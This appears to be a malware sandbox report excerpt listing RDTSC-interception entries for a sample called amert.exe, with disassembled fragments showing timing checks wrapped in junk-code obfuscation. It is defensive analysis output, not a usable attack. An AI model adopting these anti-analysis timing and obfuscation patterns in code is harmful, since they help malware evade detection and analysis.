Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0302 second address: 4FD0357 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 call 00007F0D7555855Bh 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f pushad 0x00000010 mov ax, 2611h 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ebx 0x00000017 popad 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c pushad 0x0000001d mov ch, 22h 0x0000001f mov dx, C180h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007F0D7555855Fh 0x0000002b mov eax, dword ptr [ebp+08h] 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F0D75558565h 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FD0357 second address: 4FD03CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D755569DAh 0x00000009 sub ax, 0228h 0x0000000e jmp 00007F0D755569DBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 and dword ptr [eax], 00000000h 0x0000001a jmp 00007F0D755569E6h 0x0000001f and dword ptr [eax+04h], 00000000h 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F0D755569DAh 0x0000002a or ah, FFFFFFB8h 0x0000002d jmp 00007F0D755569DBh 0x00000032 popfd 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F0D755569E5h 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0626 second address: 4FB062A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB062A second address: 4FB0630 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0630 second address: 4FB0636 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0636 second address: 4FB0652 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0D755569DFh 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0652 second address: 4FB0656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB0656 second address: 4FB065C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FB065C second address: 4FB066B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D7555855Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0768 second address: 4FF076E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF076E second address: 4FF07A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558567h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0D75558564h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF07A2 second address: 4FF07A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF07A7 second address: 4FF083E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, E8C2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0D7555855Fh 0x00000013 and eax, 2F0F17BEh 0x00000019 jmp 00007F0D75558569h 0x0000001e popfd 0x0000001f mov ah, 21h 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007F0D75558569h 0x0000002b add cx, B4A6h 0x00000030 jmp 00007F0D75558561h 0x00000035 popfd 0x00000036 push eax 0x00000037 push edx 0x00000038 pushfd 0x00000039 jmp 00007F0D7555855Eh 0x0000003e sub eax, 6EEEEA48h 0x00000044 jmp 00007F0D7555855Bh 0x00000049 popfd 0x0000004a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF083E second address: 4FF08AE instructions: 0x00000000 rdtsc 0x00000002 call 00007F0D755569E8h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F0D755569DEh 0x00000011 mov dword ptr [esp], ecx 0x00000014 jmp 00007F0D755569E0h 0x00000019 mov eax, dword ptr [76FB65FCh] 0x0000001e jmp 00007F0D755569E0h 0x00000023 test eax, eax 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F0D755569E7h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF08AE second address: 4FF08FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0253C60Ah 0x00000008 push edi 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007F0DE749B601h 0x00000013 pushad 0x00000014 mov ecx, edx 0x00000016 push ebx 0x00000017 movzx esi, di 0x0000001a pop edx 0x0000001b popad 0x0000001c mov ecx, eax 0x0000001e jmp 00007F0D7555855Ah 0x00000023 xor eax, dword ptr [ebp+08h] 0x00000026 jmp 00007F0D75558561h 0x0000002b and ecx, 1Fh 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F0D7555855Dh 0x00000035 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF08FC second address: 4FF0923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, EBh 0x00000005 jmp 00007F0D755569E8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d ror eax, cl 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0923 second address: 4FF093C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F0D75558563h 0x00000009 pop esi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF093C second address: 4FF0942 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FF0942 second address: 4FF0946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA001D second address: 4FA00AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushfd 0x00000006 jmp 00007F0D755569E8h 0x0000000b and ah, 00000048h 0x0000000e jmp 00007F0D755569DBh 0x00000013 popfd 0x00000014 popad 0x00000015 push eax 0x00000016 pushad 0x00000017 push edx 0x00000018 mov ax, A851h 0x0000001c pop eax 0x0000001d mov si, bx 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 call 00007F0D755569DFh 0x00000028 pop edx 0x00000029 pushfd 0x0000002a jmp 00007F0D755569E4h 0x0000002f adc esi, 4D1E1308h 0x00000035 jmp 00007F0D755569DBh 0x0000003a popfd 0x0000003b popad 0x0000003c mov ebp, esp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F0D755569E5h 0x00000045 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA00AA second address: 4FA00CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558561h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f mov edx, eax 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA00CF second address: 4FA00D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA00D3 second address: 4FA00EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558563h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA00EA second address: 4FA015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F0D755569E7h 0x00000011 add cx, 4C1Eh 0x00000016 jmp 00007F0D755569E9h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ecx 0x0000001e jmp 00007F0D755569DDh 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0D755569DDh 0x0000002b rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA015F second address: 4FA016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D7555855Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA016F second address: 4FA01CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pushfd 0x0000000f jmp 00007F0D755569E2h 0x00000014 xor ax, 96D8h 0x00000019 jmp 00007F0D755569DBh 0x0000001e popfd 0x0000001f pop ecx 0x00000020 movsx edx, ax 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F0D755569E0h 0x0000002a mov ebx, dword ptr [ebp+10h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F0D755569DAh 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA01CE second address: 4FA01D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA01D4 second address: 4FA01E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569DDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA01E5 second address: 4FA0237 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558561h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov esi, 064700E3h 0x00000012 mov di, ax 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F0D75558565h 0x0000001c xchg eax, esi 0x0000001d pushad 0x0000001e push edi 0x0000001f pushad 0x00000020 popad 0x00000021 pop esi 0x00000022 popad 0x00000023 mov esi, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F0D7555855Eh 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0237 second address: 4FA0259 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov ebx, 3C2B8BF6h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bx, B1FCh 0x00000019 mov bl, F1h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0259 second address: 4FA0291 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 60961600h 0x00000008 pushfd 0x00000009 jmp 00007F0D75558569h 0x0000000e jmp 00007F0D7555855Bh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0291 second address: 4FA0295 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0295 second address: 4FA02B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558567h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA02B0 second address: 4FA030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D755569DFh 0x00000009 xor cl, FFFFFFEEh 0x0000000c jmp 00007F0D755569E9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F0D755569E0h 0x00000018 adc eax, 35775B68h 0x0000001e jmp 00007F0D755569DBh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 test esi, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA030E second address: 4FA0312 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0312 second address: 4FA0318 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0318 second address: 4FA035F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7555855Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0DE74E6845h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F0D7555855Eh 0x00000016 adc si, 18F8h 0x0000001b jmp 00007F0D7555855Bh 0x00000020 popfd 0x00000021 mov si, 8E2Fh 0x00000025 popad 0x00000026 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA035F second address: 4FA0365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0365 second address: 4FA03E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 4ED4F03Bh 0x00000008 pushfd 0x00000009 jmp 00007F0D75558560h 0x0000000e sbb eax, 61A16288h 0x00000014 jmp 00007F0D7555855Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d je 00007F0DE74E67EEh 0x00000023 pushad 0x00000024 mov ebx, ecx 0x00000026 mov ecx, 4F362AF7h 0x0000002b popad 0x0000002c mov edx, dword ptr [esi+44h] 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F0D7555855Fh 0x00000038 sbb cx, 077Eh 0x0000003d jmp 00007F0D75558569h 0x00000042 popfd 0x00000043 jmp 00007F0D75558560h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA03E8 second address: 4FA0414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0D755569E1h 0x00000009 sbb ch, 00000066h 0x0000000c jmp 00007F0D755569E1h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0414 second address: 4FA0433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or edx, dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0D75558563h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0433 second address: 4FA0465 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0D755569DDh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA0465 second address: 4FA046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4FA046B second address: 4FA04BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0DE74E4BEBh 0x0000000e jmp 00007F0D755569DFh 0x00000013 test byte ptr [esi+48h], 00000001h 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b popad 0x0000001c jne 00007F0DE74E4BE6h 0x00000022 jmp 00007F0D755569DAh 0x00000027 test bl, 00000007h 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F0D755569E7h 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F908C1 second address: 4F908C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F908C7 second address: 4F908F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c push eax 0x0000000d movsx ebx, ax 0x00000010 pop ecx 0x00000011 mov dl, D2h 0x00000013 popad 0x00000014 and esp, FFFFFFF8h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F908F3 second address: 4F908F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F908F7 second address: 4F9090A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F9090A second address: 4F9093D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 pushfd 0x00000007 jmp 00007F0D75558560h 0x0000000c add esi, 32756E58h 0x00000012 jmp 00007F0D7555855Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F9093D second address: 4F90941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90941 second address: 4F9095C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558567h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F9095C second address: 4F909DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 61598CDAh 0x00000008 pushfd 0x00000009 jmp 00007F0D755569DBh 0x0000000e adc cl, 0000007Eh 0x00000011 jmp 00007F0D755569E9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b jmp 00007F0D755569E1h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F0D755569E3h 0x0000002a sbb ch, 0000003Eh 0x0000002d jmp 00007F0D755569E9h 0x00000032 popfd 0x00000033 pushad 0x00000034 popad 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F909DA second address: 4F90A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov edi, 5AD05D4Ch 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push esi 0x0000000f pushad 0x00000010 call 00007F0D7555855Eh 0x00000015 mov bx, ax 0x00000018 pop esi 0x00000019 pushfd 0x0000001a jmp 00007F0D75558567h 0x0000001f adc ch, FFFFFFAEh 0x00000022 jmp 00007F0D75558569h 0x00000027 popfd 0x00000028 popad 0x00000029 mov dword ptr [esp], esi 0x0000002c jmp 00007F0D7555855Eh 0x00000031 mov esi, dword ptr [ebp+08h] 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90A4C second address: 4F90A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90A69 second address: 4F90AB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0D75558567h 0x00000008 call 00007F0D75558568h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebx, 00000000h 0x00000016 jmp 00007F0D7555855Eh 0x0000001b test esi, esi 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90AB9 second address: 4F90AC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 0E499ADEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90AC3 second address: 4F90AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D75558564h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0DE74EDE09h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90AE7 second address: 4F90B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D755569DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 pushad 0x00000012 mov ax, B5A1h 0x00000016 pushfd 0x00000017 jmp 00007F0D755569DEh 0x0000001c xor ah, 00000038h 0x0000001f jmp 00007F0D755569DBh 0x00000024 popfd 0x00000025 popad 0x00000026 mov di, cx 0x00000029 popad 0x0000002a mov ecx, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90B31 second address: 4F90B5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F0D7555855Dh 0x0000000a sbb ecx, 4C556BD6h 0x00000010 jmp 00007F0D75558561h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90B5C second address: 4F90B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0D755569DCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90B6C second address: 4F90BB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0D7555855Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F0DE74EDD7Ch 0x00000011 jmp 00007F0D75558566h 0x00000016 test byte ptr [76FB6968h], 00000002h 0x0000001d pushad 0x0000001e call 00007F0D7555855Eh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90BB1 second address: 4F90C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 jne 00007F0DE74EC1D5h 0x0000000c pushad 0x0000000d jmp 00007F0D755569E8h 0x00000012 movzx eax, bx 0x00000015 popad 0x00000016 mov edx, dword ptr [ebp+0Ch] 0x00000019 jmp 00007F0D755569DDh 0x0000001e xchg eax, ebx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F0D755569DCh 0x00000026 sbb cx, 3848h 0x0000002b jmp 00007F0D755569DBh 0x00000030 popfd 0x00000031 mov eax, 581553BFh 0x00000036 popad 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90C17 second address: 4F90C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe RDTSC instruction interceptor: First address: 4F90C1B second address: 4F90C1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
